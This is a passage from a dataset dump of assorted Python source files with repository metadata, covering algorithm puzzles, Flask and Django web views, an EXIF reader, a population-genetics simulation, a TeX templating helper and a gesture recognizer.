위치에서 출발하는 티켓이 없거나 티켓을 다 썼을 때\n if top not in route or len(route[top]) == 0:\n path.append(stack.pop())\n else:\n stack.append(route[top].pop(0))\n return path[::-1] # 거꾸로 출력\n \n route = init()\n for r in route:\n route[r].sort()\n answer = dfs()\n \n return 
answer","repo_name":"KB-team3/AlgoGGang","sub_path":"곽승규/Week_14/P43164_여행경로.py","file_name":"P43164_여행경로.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"13345545095","text":"from flask import render_template, flash, request, url_for, redirect, abort, session, Markup\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom flask_mail import Message\nfrom application import app, bcrypt, mail, login_manager\nfrom application.classes.user import User\nfrom application.classes.session import Session\nfrom application.forms.forms import RegistrationForm, LoginForm\n\nfrom utils import plot_overall_mood, blink_rate_graph, get_blink_rate, get_blink_ratio, current_blink_rate, calc_focus_values, update_focus_value, update_focus_plots, get_mood, get_overall_mood, plot_moods\nfrom io import BytesIO \nfrom io import StringIO\nfrom PIL import Image\n\nfrom datetime import datetime\nimport os \nimport json \nimport re\nimport time\nimport numpy as np\nimport cv2\nfrom bson import ObjectId\nimport base64\n\n@login_manager.user_loader\ndef load_user(user_id):\n user_id = str(user_id)\n return User.get_by_id(user_id)\n\n@app.route(\"/home\", methods=[\"GET\", \"POST\"])\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n print(current_user.is_authenticated)\n return render_template(\"home.html\")\n\n@app.route(\"/start-session\")\ndef start_session():\n return render_template(\"start_session.html\")\n\n@app.route(\"/end-session/\")\ndef end_session(session_id):\n # current_session = current_user.get_session_by_id(session_id)\n # current_user.update_session(session_id, end_time=datetime.now, total_time=datetime.now() - current_session.start_time)\n\n return render_template(\"end_session.html\")\n\n@app.route(\"/session\", methods=[\"GET\", \"POST\"])\ndef session():\n if current_user.id == \"5fd5651341432c9630f95c8e\":\n current_session = current_user.get_session_by_id('5fd63ac9921dc84394b08bda')\n session_id = current_session.id\n header = \"\"\n else:\n current_session = Session(id=str(ObjectId()), start_time=datetime.now())\n current_user.add_session(current_session)\n session_id = current_session.id\n header = \"Currently Unavailable for Standard Users, Sample Data Displayed\"\n return render_template(\"session.html\", session_id=session_id, header=header)\n\n@login_required\n@app.route(\"/account\")\ndef account():\n user = current_user\n sessions = current_user.sessions\n info = [[session.start_time.strftime('%I:%M')] for session in sessions]\n return render_template(\"account.html\", user=user, sessions=sessions, info=info)\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form = RegistrationForm()\n \n print(form.email.data, form.password.data, form.confirm_password.data, form.validate_on_submit())\n\n if form.validate_on_submit():\n hashed_pw = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(id=str(ObjectId()), email=form.email.data, password=hashed_pw, _is_active=True, sessions=[])\n user.add()\n flash('Your account has been created', 'success')\n return redirect('login')\n\n return render_template(\"register.html\", form=form)\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n\n if form.validate_on_submit():\n user = User.get_by_email(form.email.data)\n print(user)\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n 
login_user(user)\n next_page = request.args.get('next')\n if next_page:\n return redirect(next_page)\n else:\n return redirect(url_for('home'))\n else:\n flash(\"Login Unsuccessful. Please check email and password\", 'danger')\n \n return render_template(\"login.html\", form=form)\n\n@app.route(\"/focus\", methods=[\"GET\", \"POST\"])\ndef focus():\n data_url = request.values['image']\n img_64 = data_url.replace(\"data:image/png;base64,\", \"\")\n png_as_np = np.frombuffer(base64.b64decode(img_64), dtype=np.uint8)\n print(png_as_np.shape)\n image_buffer = cv2.imdecode(png_as_np, cv2.IMREAD_COLOR)\n cv2.imwrite(\"b64out.png\",image_buffer)\n\n \n\n # nparr = np.fromstring(img_bytes, np.uint8)\n # print(nparr.shape)\n # img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n # print(\"SHAPE\", img_np.shape)\n\n return {\"status\": \"failure\"}, 200\n\n # img = Image.open(BytesIO(img_bytes))\n # img = np.array(img)\n # print(img.shape)\n\n # session_id = request.get_json().get(\"id\")\n # session = current_user.get_session_by_id(session_id)\n # img_64 = request.get_json().get(\"img\")\n \n # img_bytes = base64.b64decode(img_64)\n # img = Image.open(BytesIO(img_bytes))\n # img = np.array(img)\n # print(img)\n # cv2.imshow(img)\n\n\n # print(len(img_64))\n # decoded = base64.b64decode(img_64)\n # img_np = np.frombuffer(decoded, np.uint8)\n # print(img_np.shape)\n # img = cv2.imdecode(img_np, cv2.IMREAD_COLOR)\n # print(img is None)\n\n # focus, ratio = focus_method(img, session.focus, session.ratios)\n\n # current_user.update_session(session_id, {\"focus\": session.focus.append(focus), \"ratio\": session.ratios.append(ratio)})\n\n # value = display_focus_value(focus, len(session.focus))\n\n # print(value)\n # return value\n\n@app.route(\"/strain\")\ndef strain():\n session_id = request.args.get(\"id\")\n session = current_user.get_session_by_id(session_id)\n img_64 = request.args.get(\"img\")\n img, time = None, 0\n \n blinks = get_blink_rate(img, time, 7, session.blinks)\n blink_rate = current_blink_rate(blinks, 10, time)\n\n current_user.update_session(session_id, {\"blinks\": session.blinks, \"blink_rate\": session.blink_rate.append(blink_rate)})\n\n print(\"HERE\")\n return \"hi\"\n\n@app.route(\"/mood\")\ndef mood():\n session_id = request.args.get(\"id\")\n session = current_user.get_session_by_id(session_id)\n img_64 = request.args.get(\"img\")\n img = img_64.decode('base64')\n\n mood = get_mood(img)\n current_user.update_session(session_id, {\"mood\": session.mood.append(mood)})\n\n print(\"HERE\")\n return \"hi\"\n\n@app.route(\"/focus-line/\")\ndef focus_line(session_id):\n session = current_user.get_session_by_id(session_id)\n line, _ = update_focus_plots(session.focus, session.ratios)\n return line\n\n@app.route(\"/focus-heat/\")\ndef focus_heat(session_id):\n session = current_user.get_session_by_id(session_id)\n _, heat = update_focus_plots(session.focus, session.ratios)\n return heat\n\n@app.route(\"/mood-line/\")\ndef mood_line(session_id):\n session = current_user.get_session_by_id(session_id)\n line = plot_overall_mood(session.mood)\n return line\n\n@app.route(\"/mood-pie/\")\ndef mood_pie(session_id):\n session = current_user.get_session_by_id(session_id)\n pie = plot_moods(session.mood[-1])\n return pie\n\n@app.route(\"/strain-line/\")\ndef strain_line(session_id):\n session = current_user.get_session_by_id(session_id)\n line = blink_rate_graph(session.blink_rate, 25)\n return line\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return 
redirect(url_for('home'))","repo_name":"ronnachum11/StudyVision","sub_path":"application/routes/main_routes.py","file_name":"main_routes.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1624881356","text":"#!/usr/bin/python3\n\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\n# path to the image or video\nimagename = \"image.jpg\"\n\n# read the image data using PIL\nimage = Image.open(imagename)\n\n# extract EXIF data\nexifdata = image.getexif()\n\n# iterating over all EXIF data fields\nfor tag_id in exifdata:\n # get the tag name, instead of human unreadable tag id\n tag = TAGS.get(tag_id, tag_id)\n data = exifdata.get(tag_id)\n # decode bytes \n if isinstance(data, bytes):\n data = data.decode('latin-1')\n print(f\"{tag:25}: {data}\")\n","repo_name":"johto89/Some-command-for-security","sub_path":"exifimage.py","file_name":"exifimage.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"37945242527","text":"#!python3\n\nimport fileinput\nimport re\nfrom collections import defaultdict, Counter\nimport sys\nfrom enum import Enum\nfrom itertools import islice\n\nlines = map(lambda x: x.strip(), fileinput.input())\n\ncounts = Counter()\n\nfor line in lines:\n x1, y1, x2, y2 = re.match(r\"(\\d+),(\\d+) -> (\\d+),(\\d+)\", line).groups()\n if x1 != x2 and y1 != y2:\n print(\"\\tskip\", x1, y1, \"->\", x2, y2)\n continue\n x1 = int(x1)\n x2 = int(x2)\n y1 = int(y1)\n y2 = int(y2)\n if x1 > x2:\n x1, x2 = x2, x1\n if y1 > y2:\n y1, y2 = y2, y1\n\n counts.update({(x, y): 1 for x in range(x1, x2 + 1) for y in range(y1, y2 + 1)})\n\n# didn't bother printing anything but the example\nfor y in range(10):\n for x in range(10):\n c = counts[(x, y)]\n print(c if c > 0 else \".\", end=\"\")\n print()\n\nintersections = 0\nfor coords, count in counts.items():\n if count > 1:\n intersections += 1\n\nprint(intersections)\n","repo_name":"abersnaze/advent","sub_path":"2021/day5/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37763743026","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated by Simon Melgaard and Kamilla Andersen\r\n\r\nA function for creating a model for the airflow of a fan from its datasheet (air flow as a function of rotation speed and pressure over the fan)\r\n\"\"\"\r\n\r\nfrom scipy.optimize import curve_fit\r\nimport numpy as np\r\n\r\n\r\ndef calc_air_flow(fan_spec_rot_speed,fan_spec_pressure,fan_spec_flow,fan_signal,fan_spec_max_rot_speed,fan_pressure_difference):\r\n def func(data,a,b,c,d,e):\r\n x=data[0]\r\n y=data[1]\r\n return (x**a)*b+(y**c)*d+(x*y)**e\r\n\r\n initial_param=[1,1,0.5,-50,1]\r\n popt,pcov = curve_fit(func,[fan_spec_rot_speed, fan_spec_pressure],fan_spec_flow,p0=initial_param)\r\n \r\n print('fitted parameters', popt)\r\n \r\n modelPredictions = func([fan_spec_rot_speed, fan_spec_pressure], *popt) \r\n\r\n absError = modelPredictions - fan_spec_flow\r\n SE = np.square(absError) # squared errors\r\n MSE = np.mean(SE) # mean squared errors\r\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\r\n Rsquared = 1.0 - (np.var(absError) / np.var(fan_spec_flow))\r\n CVRMSE = RMSE/np.mean(fan_spec_flow)\r\n print('RMSE:', RMSE)\r\n print('CVRMSE:', CVRMSE*100, '%')\r\n print('R-squared:', Rsquared)\r\n \r\n\r\n return 
func([fan_signal*fan_spec_max_rot_speed/100,fan_pressure_difference], *popt)/60","repo_name":"aauphd2024/CLIMA22_data_code","sub_path":"Python_scripts/AHU/Air_flow_calculation_over_fan.py","file_name":"Air_flow_calculation_over_fan.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37219862681","text":"from collections import defaultdict\n\nclass Solution:\n    def bestHand(self, ranks: 'List[int]', suits: 'List[str]') -> str: # O( N | N )\n        r_cnt = defaultdict(lambda:0)\n        s_cnt = defaultdict(lambda:0)\n        for r in ranks:\n            r_cnt[r] +=1\n        for s in suits:\n            s_cnt[s] += 1\n        \n        r_mx = max(r_cnt.values()) #max rank value\n        \n        if len(s_cnt) == 1: # all five cards with same suit\n            return \"Flush\" \n        elif r_mx >= 3: # at least 3 cards of same rank\n            return \"Three of a Kind\"\n        elif r_mx >= 2: # at least 2 cards with same rank\n            return \"Pair\" \n        else: # other situation\n            return \"High Card\"\n\n\n\n    ","repo_name":"renjieliu/leetcode","sub_path":"2000_2499/2347.py","file_name":"2347.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
{"seq_id":"71575721334","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom numpy import sum as nsum\nfrom numpy import add as nadd\nfrom numpy import zeros as zeros\nfrom numpy import nonzero\nfrom numpy import int32 as nint32, uint32 as nuint32\nfrom numpy.random import binomial\nfrom numpy.random import multinomial\n\nfrom hankshaw import genome\n\n\nclass Population(object):\n    \"\"\"Represent a population within a metapopulation\n\n    A population is a collection of individuals. Each individual is represented\n    by a number. The binary representation of that number defines that\n    individual's genotype. The state of the highest order bit determines whether\n    (1) or not (0) that individual is a producer.\n\n    * genome_length: the length of the genome. The production allele is added to\n    this, so the number of genotypes is 2^(genome_length+1)\n    * stress_survival_rate: the probability of an individual surviving a change\n    of environment (stress)\n    * mutation_rate_social: the probability of a mutation (bit flip) occurring at\n    the social locus\n    * mutation_rate_adaptation: the probability of a mutation (bit flip) at a\n    non-social locus\n    * capacity_min: the minimum size of a fully-grown population. This occurs\n    when there are no producers\n    * capacity_max: the maximum size of a fully-grown population. This occurs\n    when a population consists entirely of producers\n    * production_cost: the fitness cost of production. 
This manifests itself as\n a decrease in growth rate\n * initialize: How to initialize the population\n empty: the population will have no individuals\n\n\n \"\"\"\n\n def __init__(self, metapopulation, config):\n \"\"\"Initialize a Population object\"\"\"\n self.metapopulation = metapopulation\n self.config = config\n\n self.genome_length = config['Population']['genome_length']\n self.stress_survival_rate = config['Population']['stress_survival_rate']\n self.mutation_rate_social = config['Population']['mutation_rate_social']\n self.mutation_rate_adaptation = config['Population']['mutation_rate_adaptation']\n self.dilution_factor = config['Population']['dilution_factor']\n self.dilution_prob_min = config['Population']['dilution_prob_min']\n self.capacity_min = config['Population']['capacity_min']\n self.capacity_max = config['Population']['capacity_max']\n self.capacity_shape = config['Population']['capacity_shape']\n self.production_cost = config['Population']['production_cost']\n self.initialize = config['Population']['initialize']\n\n # Create an empty population\n if self.initialize.lower() == 'empty':\n self.empty()\n elif self.initialize.lower() == 'random':\n self.randomize()\n\n self.delta = zeros(self.abundances.size, dtype=nint32)\n self.diluted = True\n\n\n def __repr__(self):\n \"\"\"Return a string representation of a Population object\"\"\"\n res = \"Population: Size {s}, {p:.1%} producers\".format(s=self.size(),\n p=self.prop_producers())\n return res\n\n\n def empty(self):\n \"\"\"Empty a population\"\"\"\n self.abundances = zeros(2**(self.genome_length + 1), dtype=nuint32)\n\n\n def randomize(self):\n \"\"\"Create a random population\"\"\"\n self.abundances = np.random.random_integers(low=0,\n high=self.capacity_min,\n size=2**(self.genome_length+1))\n\n\n def dilute(self):\n \"\"\"Dilute a population\n \n dilute dilutes the population by the dilution factor, which is specified\n in the Population section of the configuration as dilution_factor.\n\n \"\"\"\n if self.is_empty():\n return\n\n self.diluted = False\n prob_dilute = 1\n\n if self.dilution_prob_min < 1:\n prob_dilute = self.dilution_prob_min + (1.0 - self.dilution_prob_min) * self.prop_producers()\n\n if self.dilution_prob_min == 1 or binomial(n=1, p=prob_dilute, size=1)[0]:\n self.abundances = binomial(self.abundances, self.dilution_factor)\n self.diluted = True\n\n\n def grow(self):\n \"\"\"Grow the population to carrying capacity\n \n The final population size is determined based on the proportion of\n producers present. This population is determined by drawing from a\n multinomial with the probability of each genotype proportional to its\n abundance times its fitness.\n \"\"\"\n\n if self.is_empty() or not self.diluted:\n return\n\n landscape = self.metapopulation.fitness_landscape\n\n final_size = self.capacity_min + \\\n (self.capacity_max - self.capacity_min) * \\\n (self.prop_producers()**self.capacity_shape)\n\n grow_probs = self.abundances * (landscape/nsum(landscape))\n\n if nsum(grow_probs) > 0:\n norm_grow_probs = grow_probs/nsum(grow_probs)\n self.abundances = multinomial(final_size, norm_grow_probs, 1)[0]\n\n self.metapopulation.num_births += self.size()\n\n\n def mutate(self):\n \"\"\"Mutate a Population\n \n Each genotype mutates to another with probability inversely proportional\n to the Hamming distance (# different bits in binary representation)\n between them. 
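The `dilute`/`grow` pair in the `Population` record above implements a serial-transfer step: every genotype count is thinned by an independent binomial draw, and the survivors regrow to a fixed final size through a multinomial whose probabilities weight abundance by relative fitness. A minimal standalone sketch of that pattern (the toy `abundances`, `fitness`, `dilution_factor`, and final size of 1000 are illustrative values, not taken from the record):

```python
import numpy as np

rng = np.random.default_rng(0)

abundances = np.array([500, 300, 200])  # toy genotype counts (illustrative)
fitness = np.array([1.0, 1.2, 0.9])     # toy fitness landscape (illustrative)
dilution_factor = 0.1                   # each individual survives with p = 0.1

# Dilution: independent binomial thinning of every genotype count.
survivors = rng.binomial(abundances, dilution_factor)

# Regrowth: the final size is fixed; the composition is a multinomial draw
# with probabilities proportional to abundance * relative fitness.
grow_probs = survivors * (fitness / fitness.sum())
if grow_probs.sum() > 0:
    abundances = rng.multinomial(1000, grow_probs / grow_probs.sum())
print(abundances.sum())  # 1000 whenever at least one genotype survived
```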
The distances between all pairs of genotypes is\n pre-calculated at the beginning of a run and stored in\n metapopulation.mutation_probs.\n \n \"\"\"\n\n if self.is_empty():\n return\n\n if not self.diluted:\n return\n\n mutated_population = zeros(self.abundances.size, dtype=nuint32)\n\n for i in nonzero(self.abundances)[0]:\n mutated_population = nadd(mutated_population,\n multinomial(self.abundances[i],\n self.metapopulation.mutation_probs[i],\n size=1)[0])\n\n self.abundances = mutated_population\n\n\n def select_migrants(self, migration_rate):\n \"\"\"Select individuals to migrate\n \n Select genotypes to migrate. The amount of each genotype that migrates\n is chosen in proportion to that genotype's abundance.\n \n \"\"\"\n\n assert migration_rate >= 0 and migration_rate <= 1\n\n return binomial(self.abundances, migration_rate)\n\n\n def remove_emigrants(self, emigrants):\n \"\"\"Remove emigrants from the population\n \n remove_emigrants removes the given emigrants from the population. The\n genotypes are not immediately removed to the population, but their\n counts are placed in a temporary area until census() is called.\n\n \"\"\"\n self.delta -= emigrants\n\n\n def add_immigrants(self, immigrants):\n \"\"\"Add immigrants to the population\n \n add_immigrants adds the given immigrants to the population. The new\n genotypes are not immediately added to the population, but placed in\n a temporary area until census() is called.\n\n \"\"\"\n self.delta += immigrants\n\n\n def census(self):\n \"\"\"Update the population's abundances after migration\n \n When migration occurs, the immigrants and emigrants are not directly\n accounted for in the list of genotype abundances. This function adds\n immigrants and removes emigrants to/from the abundances.\n \n \"\"\"\n\n self.abundances = nadd(self.abundances, self.delta)\n self.delta = zeros(self.abundances.size, dtype=nint32)\n\n\n def reset_loci(self, num_loci):\n \"\"\"Reset the loci of the population to all zeros\n\n When an environment changes, the population is not yet adapted to it.\n This function captures this change by resetting num_loci fitness-encoding\n loci to zero.\n \"\"\"\n assert num_loci <= self.genome_length\n\n if self.is_empty():\n return\n\n new_abundances = zeros(self.abundances.size, dtype=np.int)\n gs = np.right_shift(np.arange(start=0, stop=2**self.genome_length), num_loci)\n genotypes_shifted = np.append(gs, gs + (2**self.genome_length))\n\n for i in range(2**(self.genome_length+1)):\n new_abundances[genotypes_shifted[i]] += self.abundances[i]\n\n self.abundances = new_abundances\n\n # OLD WAY OF DOING THIS FOR ALL LOCI -------------------------------\n #num_producers = self.num_producers()\n #num_nonproducers = self.num_nonproducers()\n\n #self.abundances = zeros(self.abundances.size, dtype=np.int)\n #self.abundances[0] = num_nonproducers\n #self.abundances[2**self.genome_length] = num_producers\n\n\n def bottleneck(self, survival_rate):\n \"\"\" Pass the population through a bottleneck\n\n This function passes the population through a bottleneck. The\n probability of survival is specified as the survival_rate parameter\n [0,1]. 
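`mutate` above draws each genotype's offspring from a multinomial over `metapopulation.mutation_probs[i]`, a precomputed row-stochastic matrix whose construction is not shown in this excerpt. One plausible construction, consistent with the docstring (mutation probability falls off with Hamming distance) and the two configured rates, treats every bit as flipping independently, with the social locus using its own rate; this is a sketch under those assumptions, not necessarily the repo's exact matrix:

```python
import numpy as np

def build_mutation_probs(genome_length, mu_social, mu_adapt):
    """Row i, column j holds P(i mutates to j) when each bit flips
    independently; the highest-order bit is the social locus."""
    n = 2 ** (genome_length + 1)
    probs = np.zeros((n, n))
    for i in range(n):
        for j in range(n):
            diff = i ^ j  # bits where the two genotypes differ
            p = 1.0
            for bit in range(genome_length + 1):
                mu = mu_social if bit == genome_length else mu_adapt
                p *= mu if (diff >> bit) & 1 else 1.0 - mu
            probs[i, j] = p
    return probs  # every row sums to 1 by construction

m = build_mutation_probs(genome_length=3, mu_social=1e-2, mu_adapt=1e-3)
assert np.allclose(m.sum(axis=1), 1.0)
```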
\n \"\"\"\n\n assert survival_rate >= 0\n assert survival_rate <= 1\n\n self.abundances = binomial(self.abundances, survival_rate)\n\n\n def size(self):\n \"\"\"Get the size of the population\"\"\"\n return self.abundances.sum()\n\n\n def __len__(self):\n return self.abundances.sum()\n\n\n def is_empty(self):\n \"\"\"Return whether or not the population is empty\"\"\"\n return self.abundances.sum() == 0\n\n\n def num_producers(self):\n \"\"\"Get the number of producers\"\"\"\n return self.abundances[2**self.genome_length:].sum()\n\n\n def num_nonproducers(self):\n \"\"\"Get the number of non-producers\"\"\"\n return self.abundances[:2**self.genome_length].sum()\n\n\n def prop_producers(self):\n \"\"\"Get the proportion of producers\"\"\"\n popsize = self.abundances.sum()\n \n if popsize == 0:\n return 'NA'\n else:\n return 1.0 * self.num_producers() / popsize\n\n\n def average_fitness(self):\n \"\"\"Get the average fitness in the population\"\"\"\n\n popsize = self.size()\n landscape = self.metapopulation.fitness_landscape\n\n if popsize == 0:\n return 'NA'\n else:\n return nsum(self.abundances * landscape)/popsize\n\n\n def max_fitnesses(self):\n \"\"\"Get the maximum fitness among producers and non-producers\"\"\"\n\n popsize = self.size()\n\n if popsize == 0:\n return (0,0)\n\n # Get the fitnesses of genotypes present in the population\n fitnesses = np.array(self.abundances > 0, dtype=int) * self.metapopulation.fitness_landscape\n\n max_producer = fitnesses[2**self.genome_length:].max()\n max_nonproducer = fitnesses[:2**self.genome_length].max()\n\n return (max_producer, max_nonproducer)\n\n","repo_name":"briandconnelly/hankshaweffect","sub_path":"model/hankshaw/Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35456545989","text":"\"\"\"MAIN VIEWS.py\"\"\"\nfrom __future__ import unicode_literals\nfrom django.contrib import messages\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom .models import *\nimport bcrypt\n# Create your views here.\ndef index(request):\n if 'id' in request.session:\n request.session.clear()\n return render(request, 'main/index.html')\n\ndef register(request):\n if request.method == \"POST\":\n #Validate\n errors = User.objects.basic_validator(request.POST)\n if len(errors) != 0:\n for tag, error in errors.iteritems():#flash messages\n messages.error(request, error, extra_tags=tag)\n #context name username\n context = {\n 'name': request.POST['name'],\n 'username': request.POST['username']\n }\n return render(request, 'main/index.html',context)\n else:\n #Hash password\n hash1 = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt())\n #Create User(key=request.POST['key'])\n newUser = User(\n name=request.POST['name'],\n username=request.POST['username'],\n password=hash1)\n newUser.save()\n request.session['id'] = User.objects.get(username=request.POST['username']).id\n return redirect('/travels')\n else:\n return redirect('/main')\n\n\ndef login(request):\n if request.method == \"POST\":\n #Validate\n errors = User.objects.login_validator(request.POST)\n if len(errors) != 0:\n for tag, error in errors.iteritems():#flash messages\n messages.error(request, error, extra_tags=tag)\n context = {\n 'lusername': request.POST['username']\n }\n return render(request, 'main/index.html',context)\n else:\n request.session['id'] = User.objects.get(username=request.POST['username']).id\n return 
redirect('/travels')\n    else:\n        return redirect('/main')\n\ndef success(request):\n    #Find name of user with session id\n    user = User.objects.get(id=request.session['id'])\n    context = {'name': user.name}\n    return render(request,'/travels',context)\n","repo_name":"mateogolf/SquiggleLines","sub_path":"squiggles/apps/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73201273011","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'commcare'\nurlpatterns = [\n    path(r'', views.home, name='home'),\n    path(r'projects/create/', views.create_project, name='create_project'),\n    path(r'projects//edit/', views.edit_project, name='edit_project'),\n    path(r'accounts/create/', views.create_account, name='create_account'),\n    path(r'accounts//edit/', views.edit_account, name='edit_account'),\n]\n","repo_name":"dimagi/commcare-sync","sub_path":"apps/commcare/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"71447815732","text":"from itertools import permutations\n\ndef check(x):\n    for i in range(2,x//2 + 1):\n        if x % i == 0:\n            return 0\n    return 1\n\ndef solution(numbers):\n    cnt = 0\n    for i in range(1,len(numbers)+1):\n        a = list(set(permutations(numbers, i)))\n        for j in range(len(a)):\n            a[j] = list(a[j])\n            a[j] = ''.join(a[j])\n            if int(a[j]) >= 2 and a[j][0] != '0':\n                if check(int(a[j])) == 1:\n                    cnt += 1\n    return cnt","repo_name":"Haram0111/Algorithm","sub_path":"Programmers Lv2/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"71702690294","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nfrom typing import Dict\n\nfrom jinja2 import Template\n\n__version__ = '0.1.0'\n__all__ = ['jinja_tex']\n\n\ndef jinja_tex(tex_template: str, ctx: Dict[str, object]) -> str:\n    \"\"\"Render a Jinja TeX template.\n\n    Uses ``<</>>`` for variables, ``<+/+>`` for blocks, and ``<#/#>`` for comments.\n\n    :param str tex_template: a Jinja template\n    :param dict ctx: a variable context\n    \"\"\"\n    jinja_template = Template(\n        tex_template,\n        variable_start_string=r'<<',\n        variable_end_string='>>',\n        block_start_string='<+',\n        block_end_string='+>',\n        comment_start_string='<#',\n        comment_end_string='#>',\n        trim_blocks=True,\n        autoescape=False,\n    )\n    return jinja_template.render(ctx)\n","repo_name":"jhrmnn/mona","sub_path":"src/mona/sci/tex.py","file_name":"tex.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"}
{"seq_id":"8697467106","text":"import numpy as np\nimport math\n\nclass Dollar_One_Model():\n\n    def __init__(self):\n        self.bounding_box_size = 500\n\n    # method used for calculating distance between two 2D points\n    def calc_distance(self, p1, p2):\n        distance = math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n        return distance\n\n    # step 1 resample the given points to n evenly spaced points\n    def resample_points(self, points, n):\n        stroke_length = 0\n        i = 1\n        new_points = [points[0]]\n        # calculate length of stroke\n        while i < len(points):\n            p1 = points[i - 1]\n            p2 = points[i]\n            distance = self.calc_distance(p1, p2)\n            stroke_length += distance\n            i += 1\n\n        l = stroke_length / (n - 1)\n        distance_sum = 0.0\n        i = 1\n        while i < len(points):\n            p1 = points[i - 1]\n            p2 = points[i]\n            distance = self.calc_distance(p1, p2)\n            if distance_sum + distance >= l:\n                x = p1[0] + ((l - distance_sum) / distance) * (p2[0] - p1[0])\n                y = p1[1] + ((l - distance_sum) / distance) * (p2[1] - p1[1])\n                point = (x, y)\n                new_points.append(point)\n                points.insert(i, point)\n                distance_sum = 0\n            else:\n                distance_sum += distance\n            i += 1\n        # taken from: http://depts.washington.edu/acelab/proj/dollar/dollar.js\n        if len(new_points) == n - 1:\n            # sometimes we fall a rounding-error short of adding the last point\n            # so add it if so\n            new_points.append(\n                (points[len(points) - 1][0], points[len(points) - 1][1]))\n        return new_points\n\n    # step 2 - decomposed into two methods as suggested in the pseudo-code\n    def rotate(self, points):\n        new_points = self.rotate_to_zero(points)\n        new_points = self.rotate_by(\n            new_points, self.indicative_angle(new_points))\n        return new_points\n\n    def rotate_to_zero(self, points):\n        new_points = self.rotate_by(points, -self.indicative_angle(points))\n        return new_points\n\n    def indicative_angle(self, points):\n        x_coordinates = [p[0] for p in points]\n        y_coordinates = [p[1] for p in points]\n        centroid = (np.mean(x_coordinates), np.mean(y_coordinates))\n        indicative_angle = np.arctan2(\n            centroid[1] - points[0][1], centroid[0] - points[0][0])\n        return indicative_angle\n\n    def rotate_by(self, points, angle):\n        new_points = []\n        x_coordinates = [p[0] for p in points]\n        y_coordinates = [p[1] for p in points]\n        centroid = (np.mean(x_coordinates), np.mean(y_coordinates))\n        for p in points:\n            qx = (p[0] - centroid[0]) * np.cos(angle) - (p[1] - centroid[1]) * np.sin(angle) + centroid[0]\n            qy = (p[0] - centroid[0]) * np.sin(angle) + (p[1] - centroid[1]) * np.cos(angle) + centroid[1]\n            new_points.append((qx, 
qy))\n        return new_points\n\n    # step 3 - the initial size of the bounding box is set with 500\n    def scale(self, points):\n        new_points = self.scale_to_square(points, self.bounding_box_size)\n        new_points = self.translate_to_origin(new_points)\n        return new_points\n\n    def scale_to_square(self, points, size):\n        new_points = []\n        x_coordinates = [p[0] for p in points]\n        y_coordinates = [p[1] for p in points]\n        min_x, min_y = np.min(x_coordinates), np.min(y_coordinates)\n        max_x, max_y = np.max(x_coordinates), np.max(y_coordinates)\n\n        box_width = max_x - min_x\n        box_height = max_y - min_y\n\n        for p in points:\n            qx = p[0] * (size / box_width)\n            qy = p[1] * (size / box_height)\n            new_points.append((qx, qy))\n        return new_points\n\n    def translate_to_origin(self, points):\n        new_points = []\n        x_coordinates = [p[0] for p in points]\n        y_coordinates = [p[1] for p in points]\n        centroid = (np.mean(x_coordinates), np.mean(y_coordinates))\n\n        for p in points:\n            qx = p[0] - centroid[0]\n            qy = p[1] - centroid[1]\n            new_points.append((qx, qy))\n        return new_points\n\n    # step 4 - we integrated some error handling\n    # for the case that the gesture has not been recorded yet\n    # an angle of 45 degrees and a threshold of 2 degrees is\n    # suggested in the paper\n    def recognize(self, points, gestures):\n        b = np.inf\n        template_angle = 45 # degrees\n        template_threshold = 2\n        # if no gestures have been recorded:\n        updated_template = \" no recorded gestures\"\n        for template in gestures:\n            if gestures[template] == []:\n                continue\n            d = self.distance_at_best_angle(\n                points, gestures[template], template_angle, -template_angle, template_threshold)\n            if d < b:\n                b = d\n                updated_template = template\n        score = 1 - b / (0.5 * np.sqrt(\n            